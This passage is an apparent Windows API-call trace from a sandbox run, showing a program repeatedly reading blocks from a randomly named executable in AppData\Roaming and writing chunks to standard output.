(lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0133.641] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x2ee154, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x58 [0133.641] _open_osfhandle (_OSFileHandle=0x58, _Flags=8) returned 4 [0133.641] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.641] GetFileType (hFile=0x58) returned 0x1 [0133.641] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.641] GetFileSize (in: hFile=0x58, lpFileSizeHigh=0x2ee1ac | out: lpFileSizeHigh=0x2ee1ac*=0x0) returned 0x7d600 [0133.641] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.641] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.641] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.641] 
ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.642] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.642] GetFileType (hFile=0x50) returned 0x1 [0133.642] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.642] GetFileType (hFile=0x50) returned 0x1 [0133.642] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.642] WriteFile (in: hFile=0x50, lpBuffer=0x2eefe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.643] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.643] GetFileType (hFile=0x50) returned 0x1 [0133.643] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.643] WriteFile (in: hFile=0x50, lpBuffer=0x2ef034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef034*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.643] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.643] GetFileType (hFile=0x50) returned 0x1 [0133.643] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.643] WriteFile (in: hFile=0x50, lpBuffer=0x2ef084*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef084*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.643] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.643] GetFileType (hFile=0x50) returned 0x1 [0133.643] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.643] WriteFile (in: hFile=0x50, lpBuffer=0x2ef0d4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef0d4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.644] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.644] GetFileType (hFile=0x50) returned 0x1 
[0133.644] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.644] WriteFile (in: hFile=0x50, lpBuffer=0x2ef124*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef124*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.644] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.644] GetFileType (hFile=0x50) returned 0x1 [0133.644] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.644] WriteFile (in: hFile=0x50, lpBuffer=0x2ef174*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef174*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.644] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.644] GetFileType (hFile=0x50) returned 0x1 [0133.644] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.644] WriteFile (in: hFile=0x50, lpBuffer=0x2ef1c4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c4*, lpNumberOfBytesWritten=0x2ee1c8*=0x20, lpOverlapped=0x0) returned 1 [0133.644] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.644] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee1b4 | out: lpNewFilePointer=0x0) returned 1 [0133.644] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.644] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.644] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.644] GetFileType (hFile=0x50) returned 0x1 [0133.644] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.644] GetFileType (hFile=0x50) returned 0x1 [0133.644] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.644] WriteFile (in: hFile=0x50, lpBuffer=0x2eefe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, 
lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.644] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.644] GetFileType (hFile=0x50) returned 0x1 [0133.644] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.645] WriteFile (in: hFile=0x50, lpBuffer=0x2ef034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef034*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.645] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.645] GetFileType (hFile=0x50) returned 0x1 [0133.645] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.645] WriteFile (in: hFile=0x50, lpBuffer=0x2ef084*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef084*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.645] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.645] GetFileType (hFile=0x50) returned 0x1 [0133.645] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.645] WriteFile (in: hFile=0x50, lpBuffer=0x2ef0d4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef0d4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.645] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.645] GetFileType (hFile=0x50) returned 0x1 [0133.645] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.645] WriteFile (in: hFile=0x50, lpBuffer=0x2ef124*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef124*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.645] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.645] GetFileType (hFile=0x50) returned 0x1 [0133.645] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.645] WriteFile (in: hFile=0x50, lpBuffer=0x2ef174*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef174*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, 
lpOverlapped=0x0) returned 1 [0133.645] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.645] GetFileType (hFile=0x50) returned 0x1 [0133.645] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.645] WriteFile (in: hFile=0x50, lpBuffer=0x2ef1c4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c4*, lpNumberOfBytesWritten=0x2ee1c8*=0x20, lpOverlapped=0x0) returned 1 [0133.645] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.645] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee1b4 | out: lpNewFilePointer=0x0) returned 1 [0133.645] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.645] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.645] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.645] GetFileType (hFile=0x50) returned 0x1 [0133.645] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.645] GetFileType (hFile=0x50) returned 0x1 [0133.645] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.645] WriteFile (in: hFile=0x50, lpBuffer=0x2eefe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.646] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.646] GetFileType (hFile=0x50) returned 0x1 [0133.646] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.646] WriteFile (in: hFile=0x50, lpBuffer=0x2ef034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef034*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.646] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.646] GetFileType (hFile=0x50) returned 0x1 [0133.646] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.646] WriteFile (in: hFile=0x50, 
lpBuffer=0x2ef084*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef084*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.646] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.646] GetFileType (hFile=0x50) returned 0x1 [0133.646] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.646] WriteFile (in: hFile=0x50, lpBuffer=0x2ef0d4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef0d4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.646] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.646] GetFileType (hFile=0x50) returned 0x1 [0133.646] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.646] WriteFile (in: hFile=0x50, lpBuffer=0x2ef124*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef124*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.646] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.646] GetFileType (hFile=0x50) returned 0x1 [0133.646] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.646] WriteFile (in: hFile=0x50, lpBuffer=0x2ef174*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef174*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.646] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.646] GetFileType (hFile=0x50) returned 0x1 [0133.646] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.646] WriteFile (in: hFile=0x50, lpBuffer=0x2ef1c4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c4*, lpNumberOfBytesWritten=0x2ee1c8*=0x20, lpOverlapped=0x0) returned 1 [0133.646] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.646] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee1b4 | out: lpNewFilePointer=0x0) returned 1 [0133.646] _get_osfhandle 
(_FileHandle=4) returned 0x58 [0133.646] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.646] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.646] GetFileType (hFile=0x50) returned 0x1 [0133.646] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.646] GetFileType (hFile=0x50) returned 0x1 [0133.646] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.646] WriteFile (in: hFile=0x50, lpBuffer=0x2eefe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.647] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.647] GetFileType (hFile=0x50) returned 0x1 [0133.647] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.647] WriteFile (in: hFile=0x50, lpBuffer=0x2ef034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef034*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.647] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.647] GetFileType (hFile=0x50) returned 0x1 [0133.647] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.647] WriteFile (in: hFile=0x50, lpBuffer=0x2ef084*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef084*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.647] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.647] GetFileType (hFile=0x50) returned 0x1 [0133.647] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.647] WriteFile (in: hFile=0x50, lpBuffer=0x2ef0d4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef0d4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.647] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.647] 
GetFileType (hFile=0x50) returned 0x1 [0133.647] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.647] WriteFile (in: hFile=0x50, lpBuffer=0x2ef124*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef124*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.647] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.647] GetFileType (hFile=0x50) returned 0x1 [0133.647] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.647] WriteFile (in: hFile=0x50, lpBuffer=0x2ef174*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef174*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.647] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.647] GetFileType (hFile=0x50) returned 0x1 [0133.647] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.647] WriteFile (in: hFile=0x50, lpBuffer=0x2ef1c4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c4*, lpNumberOfBytesWritten=0x2ee1c8*=0x20, lpOverlapped=0x0) returned 1 [0133.647] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.647] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee1b4 | out: lpNewFilePointer=0x0) returned 1 [0133.647] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.647] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.647] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.647] GetFileType (hFile=0x50) returned 0x1 [0133.647] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.647] GetFileType (hFile=0x50) returned 0x1 [0133.647] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.647] WriteFile (in: hFile=0x50, lpBuffer=0x2eefe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | 
out: lpBuffer=0x2eefe4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.648] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.648] GetFileType (hFile=0x50) returned 0x1 [0133.648] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.648] WriteFile (in: hFile=0x50, lpBuffer=0x2ef034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef034*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.648] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.648] GetFileType (hFile=0x50) returned 0x1 [0133.648] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.648] WriteFile (in: hFile=0x50, lpBuffer=0x2ef084*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef084*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.648] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.648] GetFileType (hFile=0x50) returned 0x1 [0133.648] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.648] WriteFile (in: hFile=0x50, lpBuffer=0x2ef0d4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef0d4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.648] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.648] GetFileType (hFile=0x50) returned 0x1 [0133.648] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.648] WriteFile (in: hFile=0x50, lpBuffer=0x2ef124*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef124*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.648] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.648] GetFileType (hFile=0x50) returned 0x1 [0133.648] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.648] WriteFile (in: hFile=0x50, lpBuffer=0x2ef174*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef174*, 
lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.648] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.648] GetFileType (hFile=0x50) returned 0x1 [0133.648] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.648] WriteFile (in: hFile=0x50, lpBuffer=0x2ef1c4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c4*, lpNumberOfBytesWritten=0x2ee1c8*=0x20, lpOverlapped=0x0) returned 1 [0133.648] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.648] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee1b4 | out: lpNewFilePointer=0x0) returned 1 [0133.648] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.648] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.648] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.648] GetFileType (hFile=0x50) returned 0x1 [0133.648] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.648] GetFileType (hFile=0x50) returned 0x1 [0133.648] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.648] WriteFile (in: hFile=0x50, lpBuffer=0x2eefe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.649] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.649] GetFileType (hFile=0x50) returned 0x1 [0133.649] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.649] WriteFile (in: hFile=0x50, lpBuffer=0x2ef034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef034*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.649] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.649] GetFileType (hFile=0x50) returned 0x1 [0133.649] _get_osfhandle (_FileHandle=1) returned 0x50 
[0133.649] WriteFile (in: hFile=0x50, lpBuffer=0x2ef084*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef084*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.649] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.649] GetFileType (hFile=0x50) returned 0x1 [0133.649] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.649] WriteFile (in: hFile=0x50, lpBuffer=0x2ef0d4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef0d4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.649] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.649] GetFileType (hFile=0x50) returned 0x1 [0133.649] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.649] WriteFile (in: hFile=0x50, lpBuffer=0x2ef124*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef124*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.649] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.649] GetFileType (hFile=0x50) returned 0x1 [0133.649] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.649] WriteFile (in: hFile=0x50, lpBuffer=0x2ef174*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef174*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.649] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.649] GetFileType (hFile=0x50) returned 0x1 [0133.649] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.649] WriteFile (in: hFile=0x50, lpBuffer=0x2ef1c4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c4*, lpNumberOfBytesWritten=0x2ee1c8*=0x20, lpOverlapped=0x0) returned 1 [0133.649] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.649] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee1b4 | out: lpNewFilePointer=0x0) 
returned 1 [0133.649] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.649] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.649] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.649] GetFileType (hFile=0x50) returned 0x1 [0133.649] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.649] GetFileType (hFile=0x50) returned 0x1 [0133.649] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.649] WriteFile (in: hFile=0x50, lpBuffer=0x2eefe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.650] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.650] GetFileType (hFile=0x50) returned 0x1 [0133.650] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.650] WriteFile (in: hFile=0x50, lpBuffer=0x2ef034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef034*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.650] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.650] GetFileType (hFile=0x50) returned 0x1 [0133.650] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.650] WriteFile (in: hFile=0x50, lpBuffer=0x2ef084*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef084*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.650] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.650] GetFileType (hFile=0x50) returned 0x1 [0133.650] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.650] WriteFile (in: hFile=0x50, lpBuffer=0x2ef0d4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef0d4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.650] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0133.650] GetFileType (hFile=0x50) returned 0x1 [0133.650] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.650] WriteFile (in: hFile=0x50, lpBuffer=0x2ef124*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef124*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.650] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.650] GetFileType (hFile=0x50) returned 0x1 [0133.650] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.650] WriteFile (in: hFile=0x50, lpBuffer=0x2ef174*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef174*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.650] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.650] GetFileType (hFile=0x50) returned 0x1 [0133.650] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.650] WriteFile (in: hFile=0x50, lpBuffer=0x2ef1c4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c4*, 